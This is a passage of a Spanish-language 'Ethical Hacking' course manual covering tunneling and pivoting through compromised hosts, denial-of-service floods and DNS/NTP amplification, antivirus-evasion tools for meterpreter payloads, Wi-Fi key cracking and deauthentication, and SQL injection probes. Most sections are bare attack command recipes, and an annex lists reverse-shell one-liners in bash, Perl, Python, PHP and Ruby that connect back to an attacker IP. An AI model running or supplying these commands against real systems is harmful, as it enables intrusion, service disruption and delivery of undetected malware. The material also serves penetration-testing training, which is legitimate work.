Victima Windows - (Port Fordwarding con Fpipe)
162
ETHICAL HACKING
info:

windows con permisos elevados.
En la victima windows:
fpipe.exe -l 1234 -s 1234 -r 25 10.0.0.10
Si fuera necesario adicionar excepcin al firewall
netsh firewall add portopening TCP 1234 nombre excepcin enable all
nmap -sV -p1234 192.168.80.50
163
ETHICAL HACKING
12.1. Tneles SSH

12.1.1. SSH Tunneling - Local
Se utiliza para mapear un puerto local con uno remoto.
Es un Port Fordwarding encriptado
En este ejemplo el trafico de la maquina cliente esta filtrado por un firewall

solo permite trafico por el puerto 53 (DNS) y no puede acceder directamente
al servidor web en 66.172.10.69:80
En Kali
Ejecutar SSH en el puerto 53 (/etc/ssh/sshd_config)
En el cliente (ubuntu):
ssh -p 53 -L 1080:66.172.10.69:80 [email protected]
-L 1080: Abrir puerto local (ubuntu)
164
ETHICAL HACKING
En el cliente (ubuntu) configurar el navegador web para que use proxy socks
127.0.0.1:1080. Todo el trafico sera redireccionado a 66.172.10.69:80.
12.1.2. SSH Tunneling Remoto
Utilizaremos este tipo de tnel en 2 escenarios:

Hacer accesible puertos de la victima
Acceder a redes internas
Comando genrico para estables tnel SSH remoto:
ssh -R kali_port:victim_ip:victim_port kali_ip
a) Hacer accesible puertos de la victima
Victima ubuntu (Cliente)
En la victima (ubuntu) iniciar servicio:
vncserver -rfbport 3389
165
ETHICAL HACKING
Establecemos el tnel:
ssh -R 3390:localhost:3389 [email protected]
En KALI:
vncviewer 127.0.0.1:3390
Password: linux2015
Victima Windows (Cliente)
De igual manera que en el anterior ejemplo haremos accesible el puerto

3389 (RDP) mediante este tnel.
/usr/share/windows-binaries/plink.exe
166
ETHICAL HACKING
En la victima (Windows ) :
netstat -an | find LISTEN
plink.exe -l root -pw toor -R 3390:127.0.0.1:3389 192.168.1.101
Donde:
3390: Puerto Remoto
3389 Puerto Local
En KALI:
rdesktop 127.0.0.1:3390
b) Acceder a redes internas
Acceder al puerto 445 del servidor interno 10.0.0.10
ssh -R 445:10.0.0.10:[email protected]
Si la victima fuera windows usaremos plink
plink.exe -l root -pw toor -R 445:10.0.0.10:445 192.168.80.120
167
ETHICAL HACKING
12.1.3. Dynamic Port Forwarding
Usamos este tnel para acceder a redes internas (pivoteo)
No funciona con exploits de metasploit
Pivote Linux - SSH
Necesitamos un usuario/password valido en la maquina victima para establecer

el tnel.
Desde KALI:
ssh -N -D 1080 [email protected]
Password: bug
Usando el tunel con Mozilla
168
ETHICAL HACKING
Configurar proxy:
Ahora el navegador usara socks proxyv4: 127.0.0.1:1080
Despus de configurar el navegador el atacante navega con la IP del

servidor proxy (victima linux)
Usando el tnel con Proxychains
En /etc/proxychains.conf
socks4 127.0.0.1 1080
Proxychains no enruta todos los protocolos ( Ej: smb, udp, etc)
169
ETHICAL HACKING
Pivote Linux - sshuttle
Sshuttle es un hibrido entre proxy/VPN/SSH que tiene una mejor

performance de red. Tambin necesitamos un usuario/password valido.
Desde KALI:
./sshuttle -r [email protected] 0.0.0.0/0 -vv
Password: bug
/opt/pivoting/sshuttle/
Ahora podemos acceder de manera transparente a protocolos de capa 7 de

la red interna. Ej: Con el navegador entrar a 10.0.0.10
170
ETHICAL HACKING
Pivote Windows
info:
/usr/share/windows-binaries/3proxy/
Subir a windows 3proxy para el pivoteo :
Archivo de configuracin 3proxy.cfg:
auth none
flush
external 10.0.0.3
internal 192.168.80.128
maxconn 300
socks -p 1080
Ejecutamos en Windows:
3proxy.exe 3proxy.cfg
171
ETHICAL HACKING
Usando el tunel con Proxychains
En /etc/proxychains.conf
socks4 192.168.80.128 1080
12.2. Tnel HTTP
Info:
Si hay un dispositivo que inspecciona el trafico y solo permite HTTP/HTTPS,

este bloqueara nuestra peticiones.
Para eso usaremos un tnel HTTP para encapsular nuestro trafico:
172
ETHICAL HACKING
En kali levantamos el servidor:
hts -F localhost:21 80
Todo lo recibido en el puerto 80 sera reenviado al puerto 21 pero

sin la encapsulacion HTTP
En el cliente
htc.exe -F 21 192.168.80.203:80
/usr/share/windows-binaries/httptunnel/
Usando el tnel (cliente):
173
ETHICAL HACKING
ftp 127.0.0.1
Revisando el trafico:
174
ETHICAL HACKING
13
DENEGACION DE
SERVICIO DoS
175
ETHICAL HACKING
XIII. DENEGACION DE SERVICIO (DoS)
13. Ataques basados en volumen
El objetivo de este ataque es saturar el ancho de banda.
Inundacin ICMP
Enviar tantos paquetes ICMP echo como es posible
hping3 --flood --icmp [IP] -a [IP-falso]
Se requiere de cientos o miles de computadoras para este ataque
Amplificacin DNS
176
ETHICAL HACKING
Un servidor DNS que puede resolver un dominio para cualquier IP de

internet. Usando estos servidores se puede conseguir una amplificacin de
8X
Buscar open DNS servers
namescan -i eth0 -v -n google.com -o dns.txt 190.99.92.0/22
-v Modo verbose
-n dominio a resolver
-o almacenar en archivo
Ver la peticin DNS
dig ANY google.com @190.99.92.74
Atacando:
tsunami -s 1.1.1.1 -n google.com -p 10 -f dns.txt
-s IP a atacar
-n dominio a resolver
-p Paquetes a enviar por servidor DNS
Amplificacin NTP
Un atacante enva paquetes UDP al puerto 123 (Network Time Protocol

servers), ademas el servidor debe soportar el comando MONLIST .
Buscar servidores que tengan el protocolo NTP habilitado
nmap -sU -pU:123 -Pn -n --max-retries=0 200.238.76.160
Comprobar que tengan el comando monlist habilitado
ntpdc -c monlist 223.197.243.242
177
ETHICAL HACKING
Realizar ataque:
cd /opt/DoS/ntpdos
python ntpdos.py 66.172.10.69 final_ntp.txt 2
Ataques en la vida real
13.1. Ataques a protocolo
Este tipo de ataques consume los recursos del servidor y de los dispositivos
intermediarios (firewalls, balanceadores de carga, etc)
Inundacin SYN
Hping3
Miles de paquetes SYN son enviados pero nunca responde con SYN/ACK
hping3 --flood -S -p 80 [IP]
--flood : Mandar paquetes tan rpido como pueda

-S : Syn flag
178
ETHICAL HACKING
SYN packets with false source IP
hping3 --flood -S -p 80 [IP] -a [IP-falso] -V
-a false source IP
-V Modo verbose
LOIC (Low Orbit Ion Connon)
Herramienta usada por anonymous
cd /opt/DoS/loic ; bash loic.sh run
13.2. Ataques a nivel de aplicacin
Slow HTTP
Slowloris mantiene la conexin enviando peticiones parciales HTTP (Apache 1.x,

2.x)
/opt/DoS
perl slowloris.pl -dns 192.168.0.108
python torshammer.py -t 192.168.5.176 -r 350
179
ETHICAL HACKING
XML bomb (Billion laughs)
POST archivo XML a: http://192.168.0.103/bWAPP/xxe-2.php
/root/Desktop/Laboratorio/Lab13-Web/bomb-xml.txt
Wordpress, Drupal DoS (Metasploit )
auxiliary/dos/http/wordpress_xmlrpc_dos
SSL-Exhaustion attack.
Este ataque explota la caracterstica de renegociacin de SSL
thc-ssl-dos 192.168.0.103 443 --accept
180
ETHICAL HACKING
14
EVADIENDO WAF Y
ANTIVIRUS
181
ETHICAL HACKING
XIV. EVADIENDO IDS/IPS,FIREWALL Y ANTIVIRUS
14. Antivirus
14.1.1. Encriptadores/Ofuscadores
Hyperion
cd /usr/share/windows-binaries/Hyperion-1.2
wine crypter.exe payload.exe encrypted.exe
182
ETHICAL HACKING
Enigma Protector
Para encriptar el ejecutable podemos usar enigma (Windows 8)
http://www.enigmaprotector.com/
14.1.2. Frameworks
Ultimet
Crear un ejecutable malicioso
/opt/Evasion/antivirus/ultimet/
wine ultimet.exe -h [kali-ip] -p [kali-port] -t reverse_tcp -f

metsrv.dll --msfpayload
Generara el archivo REVERSE_TCP-192.168.80.173-4444.exe
183
ETHICAL HACKING
Con Metasploit podemos recibir la sesion
Use exploit/multi/handler
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LPORT 4444
Shelter
/opt/Evasion/antivirus/shellter
Copiar cualquier ejecutable como plantilla
cp /usr/share/windows-binaries/autorunsc.exe .
Iniciar
Wine shellter.exe
Choose A for Automatic Mode.

At the PE Target Prompt, enter shelter.exe.
When prompted for Payloads select L and then 1.
Introducir IP y puerto
Con Metasploit podemos agarrar la sesion
Set LPORT 4444
184
ETHICAL HACKING
Shelter depende del ejecutable que se usa plantilla para que el

ataque sea exitoso. Probar con varios
Veil framework
Es un framework para la evasin de antivirus, Veil hace esto mediante la

generacin de payloads al azar y nicos, podemos comparar estos payloads
con un malware polimrfico, que cambia a medida que se mueve de un host
a otro
/opt/Evasion/antivirus/Veil-Evasion
Iniciar framework
python Veil-Evasion.py
Usar modulo python/meterpreter/rev_tcp (34)

Configurar lhost, lport
Dejar los demas parametros por defecto
Con Metasploit podemos agarrar la sesion
Set LPORT 4444
185
ETHICAL HACKING
Comparativa de frameworks
SOPHOS AVG AVAST BitDefender ESET

msfvenom detected detected detected detected no
Ultimet no detected detected no no
shellter no no no no no
Veil-evasion No No No No no
Antivirus mas usados:
Datos de opswat.com4
https://www.opswat.com/resources/reports/antivirus-and-compromised-device-january-2015#antiviru
s-vendor-market-share
186
ETHICAL HACKING
15
ATTACKING
WIRELESS
187
ETHICAL HACKING
XV. ATTACKING WIRELESS
Terminologa
AP: Access Point (Router inalambrico)

BSSID: direccin MAC del AP
ESSID: Nombre de la red wifi
Adaptador wireless necesario que soporte modo monitor, APLHA Wi-Fi:
15. Monitoriar redes
Interfaz modo monitor
airmon-ng start wlan0
Despues de ejecutar el comando tendremos una interfaz wlan0mon
Monitorear
airodump-ng -i wlan0mon
188
ETHICAL HACKING
Descubre redes ocultas
Podemos adicionar estos flags para filtrar la salida:

--essid-regex Test
-c [canal_num]
15.1. Atacando WPS (WiFi Protected Setup)
Existe un fallo de seguridad descubierto en diciembre del 2011 que afecta a

routers inalmbricos que tienen la funcin WPS (tambin llamada QSS),
El fallo permite a un atacante recuperar la clave pre-compartida de la red

WPA/WPA2 con el PIN WPS
15.1.1. WPS Pixie dust attack
Para listar todas las redes que tienen habilitados WPS:
wash -i wlan0mon
Una ves que tengamos los datos ejecutamos reaver para obtener el PIN
reaver -i wlan0mon -c [canal] -b [BSSID] -K 1
-c Canal
-b MAC del AP
-K Habilitar ataque pixie dust
189
ETHICAL HACKING
Clave WPA: piso2seoane
El ataque NO funciona con todas las marcas
15.1.2. Fuerza bruta
Analisis de la Clave WPS (8 dgitos):
Combinacin original:
10^8 (100 million)
El router evala en PIN de manera separada:

10^4+10^4 = 20,000
Eliminando el ultimo dgito (checksum):

10^4+10^3 = 11,000
TOTAL DE COMBINACIONES = 11,000
Bully
bully wlan0mon -b [BSSID] -e [ESSID] -c [canal]
190
ETHICAL HACKING
reaver
reaver -i wlan0mon -b [BSSID] --fail-wait=360
Los nuevos APs bloquean WPS despus de varios intentos
15.2. Atacando WPA
Primero con airodump-ng esperamos que un cliente se asocie al AP
Obtener WPA handshake
airodump-ng wlan0mon -c [canal] --write wpahandshake
Des-autenticacion
Necesitamos que se autentifique de nuevo un cliente, por eso lo desasociamos

primero.
aireplay-ng --deauth 50 -a [BSSID] -c [MAC] --ignore-negative-one

wlan0mon
191
ETHICAL HACKING
Ataque de diccionario con aircrack-ng
aircrack-ng wpahandshake.cap -w /usr/share/wordlists/real.txt
Velocidad promedio de crackeo es de solo 600 Hashes/segundo
Se recomienda crackear con GPU: Ver Usando Hashcat
15.2.1. Cambiar de direccin MAC
Cuando el AP tiene activado el filtro MAC, necesitamos cambiar de MAC a una

registrada:
ifconfig wlan0 down

macchanger -m [nueva_MAC] wlan0
ifconfig wlan0 up
15.3. Atacando WEP
Capturar los IVs generado
airodump-ng -c [canal] -w [essid] --bssid [bssid] wlan0mon
Enviar paquetes falsos para obtener mas trafico (IVs)
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h [mac-kali]

wlan0mon
Obtener 40.000 IVs (data packets)
192
ETHICAL HACKING
Obtener llave WEP
aircrack-ng -b [bssid] [nombre-red]*.cap
193
ETHICAL HACKING
16
CIBER SEGURIDAD
194
ETHICAL HACKING
XVI. CIBER-SEGURIDAD
16. Historia
Sabotaje a la tubera trans-siberiana (1982)
La tubera utilizaba un sofisticado sistema de control y el software

haba sido robados de una empresa canadiense por la KGB.
La CIA presuntamente hizo que la empresa inserte una bomba lgica en
el programa para fines de sabotaje, a la larga resulta en una explosin
de la tubera con el poder de tres kilotones de TNT.
Fuente: http://en.wikipedia.org/wiki/Siberian_pipeline_sabotage
New York Times (2012-2013)
Hackers chinos hackearon repetidamente los sistemas del NYT por el

lapso de 4 meses
Robaron passwords de los reporteros y atacaron cuentas personales
Fuente:http://www.foxnews.com/world/2013/01/31/new-york-times-say-its-
computer-networks-were-repeatedly-hacked-by-chinese/
Hackeado Autoridades de Certificacin (CA)
Comodo Hack (2011)

Comodo es la segunda Autoridades de Certificacin mas grande
Comprometi el 20-25% de Internet
Fuente:http://privacy-pc.com/articles/ssl-and-the-future-of-authenticity-c
omodo-hack-and-secure-protocol-components.html
Diginotar (2011)
Comprometi TODOS los sitios web pblicas del gobierno holands

DigiNotar luego fue a la quiebra
195
ETHICAL HACKING
Fuente: http://www.f-secure.com/weblog/archives/00002228.html
16.1. Advanced Persistent Threat (APT)
Stuxnet (2010)
Fue diseado para atacar industriales controladores lgicos

programables (PLC).
Exploto cuatro 0-days de las mquinas que utilizan el sistema operativo
Microsoft Windows
Stuxnet segn informes comprometida PLC iranes, recopilaba
informacin sobre los sistemas industriales
Las centrifugadoras giraran rpidamente hasta que se hicieron trizas
Se cree que el autor es USA/Israel
Fuente:http://www.forbes.com/2010/10/06/iran-nuclear-computer-technolo
gy-security-stuxnet-worm.html
196
ETHICAL HACKING
GhostNet (2009)
Una gran operacin de espionaje electrnico, cuyo origen mayoritario

se centraba China.
Red que haba logrado infiltrarse en al menos 1.295 computadoras en
103 pases alrededor del mundo.
Se descubri que fueron comprometidos embajadas y otras oficinas
gubernamentales, as como tambin centros de exilio del tibetano Dali
Lama en la India y en las ciudades de Bruselas, Londres y Nueva York.
Fuente: http://www.defense.gov/pubs/pdfs/2010_CMPR_Final.pdf
Careto (2014)
Su lista de objetivos que inclua oficinas diplomticas y embajadas,

Careto se cree que ser el trabajo de un Estado-nacin (Probablemente
Espaa)
El malware se dice que tiene mltiples backdoors en Linux, Mac OS X y
Windows
Las infecciones se han observado en: Argelia, Argentina, Blgica,
Bolivia, Brasil, China, Colombia, Costa Rica, Cuba, Egipto, Francia,
Alemania, Gibraltar, Guatemala, Irn, Irak, Libia, Malasia, Marruecos,
Mxico, Noruega, Pakistn , Polonia, Sudfrica, Espaa, Suiza, Tnez,
Turqua, Reino Unido, Estados Unidos y Venezuela.
Vulnerabilidades explotadas: Adobe Flash Player exploit
(CVE-2012-0773)
Centro de ciberdefenza Espaa
Carbanak (2015)
Focalizado (pero no limitado a) las instituciones financieras

El malware se dice que haba sido introducido a travs de phishing
Han robado ms de 500 millones de dlares, o 1BN dlares en otros
informes
197
ETHICAL HACKING
16.2. Uso de armas 0-day
Empresas descubren 0-days, desarrollar exploits, y los venden

exclusivamente a clientes individuales
Mantienen los detalles y sus clientes secretos
Empresas VUPEN vende 0-days y malware a gobiernos
(http://www.vupen.com/)
Los 0-days se convierten en forever-days porque las vulnerabilidades
nunca son parchadas
16.3. Espionaje de otros pases
China y sus Industrias estatales
Gobierno chino tiene "acceso generalizado" a 80 por ciento de las

comunicaciones del mundo,
Las empresas chinas Huawei y ZTE Corporation son culpadas del
espionaje industrial.
http://www.spiegel.de/international/business/the-secret-ways-of-little-kno
wn-chinese-telecoms-giant-huawei-a-875297.html
La CIA y la NSA
Michael Hayden (ex director de la CIA y la NSA)
I freely admit that all nations spy. All nations conduct espionage.
But some nations, nations like ours, self-limit. We steal other
nations secrets to keep American safe and free. We dont do it to
make Americans rich or to make American industry profitable. And
what the Chinese are doing is industrial espionage, trade secrets,
198
ETHICAL HACKING
negotiating positions, stealing that kind of information on an

unprecedented scale for Chinese economic advantage.
Fuente:http://globalpublicsquare.blogs.cnn.com/2013/02/27/hayden-chinese
-cyber-theft-on-unprecedented-scale/
Percepcin del problema
Por qu tenemos que esperar a que un iceberg nos golpee

para hacer algo?
199
ETHICAL HACKING
ANEXOS
200
ETHICAL HACKING
XVII. Anexos
17. Compilando programas (C++)
Linux
gcc program.c -o program
Windows - Visual Studio 2010/2012
Despus de crear un proyecto (Visual C++):
Configurar para que no use headers precompilados (ALT+F7):
201
ETHICAL HACKING
Configurar para que el ejecutable se compile con todas las DLL

requeridas. De no hacerlo nos pedir que instalemos C++
redistributable al ejecutarlo en otra maquina.
Evitar errores de tipos de datos
202
ETHICAL HACKING
La primera librera que se debe importar es: stdafx.h de lo contrario

generara error
Para compilar presionar F7
Visual Studio 2010/2012 instalado en Windows 8
Debug vs release
La version release: esta optimizada mientras que la version debug tiene

informacion adicional para debuggers.
Linux (Crear archivo ejecutable .exe)
No recomendable, usar Visual Studio
i586-mingw32msvc-gcc -o simple.exe simple.c
203
ETHICAL HACKING
Otros Flags
-lrpcrt4
-lws2_32
Python a exe
C:\Users\usuario\PyInstaller
C:\Python27\python.exe pyinstaller.py --onefile 18176.py
18176.py Script en python que se convierte a exe
Software instalado en Windows 8
Otro compilador de windows
C:\gcc\bin\g++.exe -static-libgcc -static-libstdc++ *.cpp -o

crypter.exe
*.cpp = Cdigo fuente
17.1. Usando Visual Studio
Habilitando DEP/SAFESEH/Stack cookie
Para habilitar/deshabilitar los stack cookies
204
ETHICAL HACKING
Hablitar SAFESEH
205
ETHICAL HACKING
Deshabilitar DEP/NX
Errores comunes al compilar en Visual Studio
undefined reference/unresolved external symbol
Fix - Adicionar al codigo fuente:
#pragma comment(lib, "ws2_32.lib")

#pragma comment(lib, "windowscodecs.lib")
The builds tools for v120 (Platform Toolset = 'v120') cannot be found
206
ETHICAL HACKING
17.2. Usando !mona
Descubrir que registros, cadenas seh, etc sobreescribimos

!mona findmsp
Encontrar direcciones que salten a ESP

!mona jmp -r esp
Encontrar direcciones POP/POP/RET

!mona seh
Encontrar direcciones POP/POP/RET que sean compatibles con unicode

!mona seh -cp unicode
Generar egg hunter

!mona egg -t b33f
17.3. Diferencias entre bases de datos
MySQL MS-SQL Oracle PostgreSQL
concat(,)
Concatenacin + || ||
concat_ws(,)
207
ETHICAL HACKING
Comentarios --, /**/, # --, /* --, /* --, /*
Operador UNION union union and; union union and;
Sub-consultas v4.1>= Si Si Si
Procedimientos
No Si Si Si
almacenados
Consultas
No Si No Si
compuestas
17.4. Variables internas de bases de datos
MS-SQL MySQL ORACLE

Versin @@version @@VERSION SELECT Versin FROM
v$instance;
Usuario actual user_name() user() SELECT user FROM
dual
Base de datos db_name() database() SELECT instance_name
actual schema() FROM v$instance;
Nombre del host @@servername @@hostname
Directorio de @@datadir
La base de datos
Directorio @@tmpdir
temporal
17.5. Explotacin automtica (sqlmap)
SQLmap es una herramienta de pruebas de penetracin que automatiza el

proceso de detectar y explotar los errores de inyeccin SQL
208
ETHICAL HACKING
Extraer informacin de la base de datos
--comando
--current-user Usuario actual
--current-db Base de datos actual
--hostname Nombre de host
--is-dba Es DBA?
--users Enumerar usuarios
--passwords Enumerar passwords
--privileges Enumerar privilegios
Parmetros para la Extraccin de datos

--comando Parmetros necesarios
--dbs
--tables -D [base-datos]
--columns -D [base-datos] -T [tabla1]
--dump -D [base-datos] -T [tabla1] -C col1,col2
17.6. Probar tipos de datos para la inyeccin
Tipo entero:
Entrada Salida si es una inyeccion basada en enteros

2' Causar error o salida vacia
" Causar error o salida vacia
2 or 1=1 Cualquier salida, tal vez diferente salida
2 and 1=1 Misma salida
2 and false Sin salida
2 and true Misma salida
2-- Misma salida
2 and true-- Misma salida
Tipo cadena (Comilla simple)
209
ETHICAL HACKING
Entrada Salida si usa comilla simple

2" Misma salida
2' or '1'='1 Cualquier salida, tal vez diferente salida
2' and '1'='1 Misma salida
2' and false--+ salida vacia
2' and true--+ Misma salida
Tipo cadena (Comilla doble)
Entrada Salida si usa comilla doble

2" Misma salida
2 or 1=1 Cualquier salida, tal vez diferente salida
2 and 1=1 Misma salida
2 and false-- salida vacia
2 and true-- Misma salida
17.7. Archivos comprimidos
.tar (solo empaqueta)

Empaquetar tar - cvf folder.tar folder/
Desempacar tar -xvf file.tar
Ver el contenido (sin
extraer) tar -tvf file.tar
.tar.gz - .tar.z - .tgz (tar con gzip)

Empaquetar y comprimir tar- czvf files.tar.gz folder/
Desempacar tar -xzvf file.tar.gz
tar -tzvf file.tar.gz
extraer)
210
ETHICAL HACKING
.gz (gzip)*
Comprimir gzip -q file
gzip -d file.gz
Descomprimir
.bz2 (bzip2)**
bzip2 file
Comprimir
bunzip2 file
bzip2 -d file.bz2
Descomprimir
bunzip2 file.bz2
* gzip rpido pero menos compresin
** bzip2 mas lento pero mas compresin
.tar.bz2 (tar con bzip2)

Comprimir $tar -jcvf file.tar.bz2 folder/
Descomprimir tar -xjvf file.tar.bz2
extraer)
bzip2 -dc file.tar.bz2 | tar -tv
.zip (zip)
Comprimir $ zip file.zip /files
Descomprimir unzip file.zip
extraer) unzip -v file.zip
.rar (rar)
apt-get install rar # (instalar primero)
Comprimir rar a file.rar folder/
Descomprimir rar e file.rar
Ver el contenido (sin rar v file.rar
extraer) rar l file.rar
211
ETHICAL HACKING
17.7.1. Desempacar zip en maquina remota
/usr/share/windows-binaries
7z.exe x archivo.zip
17.8. Enviando una Reverse shell (linux)
Bash:
bash -i >& /dev/tcp/192.168.80.173/4444 0>&1
Perl:
perl -e 'use
Socket;$i="192.168.80.173";$p=4444;socket(S,PF_INET,SOCK_STREAM,ge
tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){
open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin
/sh -i");};'
Python:
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST
REAM);s.connect(("192.168.80.173",4444));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP:
php -r '$sock=fsockopen("192.168.80.173",4444);exec("/bin/sh -i
<&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.80.173",4444).to_i;exec
sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
212
ETHICAL HACKING
Una vez se tenga una shell, ejecute este comando para obtener una
shell mas cmoda
213
ETHICAL HACKING
GLOSARIO
214
ETHICAL HACKING
XVIII. GLOSARIO
RAT (Remote Access Tool): Un RAT es una pieza de software que se utiliza
para acceder o controlar un ordenador de forma remota.
.
Worms (gusanos): Un gusano es un malware que tiene la propiedad de
duplicarse a s mismo.
Virus: Es un malware que tiene por objetivo alterar el normal funcionamiento

del ordenador.
215

Ethical Hacking

Cargado por

Copyright:

Formatos disponibles

Ethical Hacking

Cargado por

Información del documento

Descripción original:

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

Ethical Hacking

Cargado por

Copyright:

Formatos disponibles

AUTOR: Ing Daniel Torres Sandi

Comandos y resultados de comandos:

nmap -sP 216.27.130.162

find / -iname "*[nombre a buscar]*"

execute -f NetworkPasswordDump32.exe -a -f red.txt -H

Cuando se usa corchetes [] usar datos reales

Parametros importantes son coloreados:

Modulo de metasploit equivalente

Directorio donde tenemos que ejecutar los programas

Inyeccion SQL o XSS

-1 UNION ALL SELECT 1,2 --

Sistemas Operativos (Windows)

Sistemas Operativos (Linux)

I. ENTORNO DE KALI LINUX

Kali Linux es una distribucin basada en Debian GNU/Linux diseada

Las credenciales por defecto son:

/usr/share/ Este directorio contiene las herramientas de KALI

/dev Archivos de dispositivos Linux disco duro, red, etc.

/etc Archivos de configuracin de Linux. Si instala algo tiene que

/home Directorio "Hogar" de los usuarios del sistema

/root Directorio "Hogar" del usuario root

/tmp Archivos de Linux temporales

/opt Software Linux instalado (no desde el repositorio)

Directorio de exploits (Cdigo fuente):

1.1. Comandos bsicos

Comando Descripcin Ejemplo

1.2. Actualizar el sistema

Actualizar la lista de paquetes

1.3. Servicios bsicos

Archivo de configuracin: /etc/dhcp/dhcpd.conf

subnet 192.168.2.0 netmask 255.255.255.0 {

dhcpd -cf /etc/dhcp/dhcpd.conf eth0

Para poder enrutear paquetes:

Revisar puertos abiertos

Confirmar que se inicio los servicios (TCP)

netstat -antp | grep 80

-a: Mostrar todas las conexiones

Confirmar que se inicio los servicios (UDP)

netstat -auntp | grep 69

u: Mostrar conexiones UDP

Servicios que se ejecutan al inicio del sistema

Niveles de ejecucin de linux:

3: Inicio normal del sistema

Configurar servicio para que se ejecute al inicio

Configurar servicio para que NO se ejecute al inicio

Configurar modo grfico

1.4. Usando tuberas en linux

Comunicacin estndar en linux. Linux tiene tres formas estndar para

Entrada estndar: generalmente asociado con el teclado

Podemos redirigir la comunicacin estndar linux:

Ejecucin paralela y secuencial de comandos

sleep 5 & echo "hola1" & sleep 5 & echo "hola2"

sleep 5 ; echo "hola1" ; sleep 5 ; echo "hola2"

1.5. Configurando la red

ifconfig eth0 down

ifconfig eth0 192.168.0.10

Editar el archivo /etc/network/interfaces

Configurar dinmico (DHCP)

route add default gw 192.168.0.1

find / -iname "[nombre a buscar]"

find / -iname "[nombre a buscar]"

find . -iname "index"